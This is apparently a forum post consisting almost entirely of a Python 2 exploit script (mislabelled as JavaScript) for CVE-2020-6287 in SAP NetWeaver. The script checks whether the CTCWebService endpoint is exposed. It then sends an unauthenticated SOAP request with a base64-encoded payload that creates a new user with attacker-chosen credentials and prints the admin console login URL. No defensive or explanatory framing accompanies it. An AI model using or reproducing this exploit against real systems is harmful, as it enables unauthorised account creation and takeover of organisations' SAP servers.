- 注册
- 09 10, 2024
- 消息
- 186
JavaScript:
#from ducnt import <3
import requests
import base64
import sys
def check_vulnerable(_url):
url = _url+"/CTCWebService/CTCWebServiceBean?wsdl"
_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml;charset=UTF-8", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r = requests.get(url, headers=_headers, verify=False, timeout=5)
if "urn:CTCWebServiceSi" in r.content and r.status_code == 200:
print "Vulnerable"
return True
else:
print "Not Vulnerable, matane :("
return False
def add_user(_url, _username, _passwd):
_check = check_vulnerable(_url)
if _check:
url = _url+"/CTCWebService/CTCWebServiceBean/ConfigServlet"
_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/xml;charset=UTF-8", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
_payload = "<root> <user> <JavaOrABAP>java</JavaOrABAP> <username>"+str(_username)+"</username> <password>"+str(_passwd)+"</password> <userType></userType> </user></root>"
_payload = _payload.encode('base64')
_data = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"> <soapenv:Header/> <soapenv:Body> <urn:executeSynchronious> <identifier> <component>sap.com/tc~lm~config~content</component> <path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path> </identifier> <contextMessages> <baData>"+str(_payload)+"</baData> <name>userDetails</name> </contextMessages> </urn:executeSynchronious> </soapenv:Body></soapenv:Envelope>"
r = requests.post(url, headers=_headers, verify=False, data=_data, timeout=10)
if "urn:CTCWebServiceSi" in r.content and r.status_code == 200:
print "Add user successfully with credential:\nUsername: ",_username," ==== Password: ",_passwd
print "Login at: \n",_url+"/nwa"
def main():
if len(sys.argv) < 4:
print "Usage: python sap-CVE-2020-6287-add-user.py <HTTP(s)://IP:Port <username> <passwd>"
exit()
_url = sys.argv[1]
_username = sys.argv[2]
_passwd = sys.argv[3]
add_user(_url, _username, _passwd)
if __name__ == "__main__":
main()
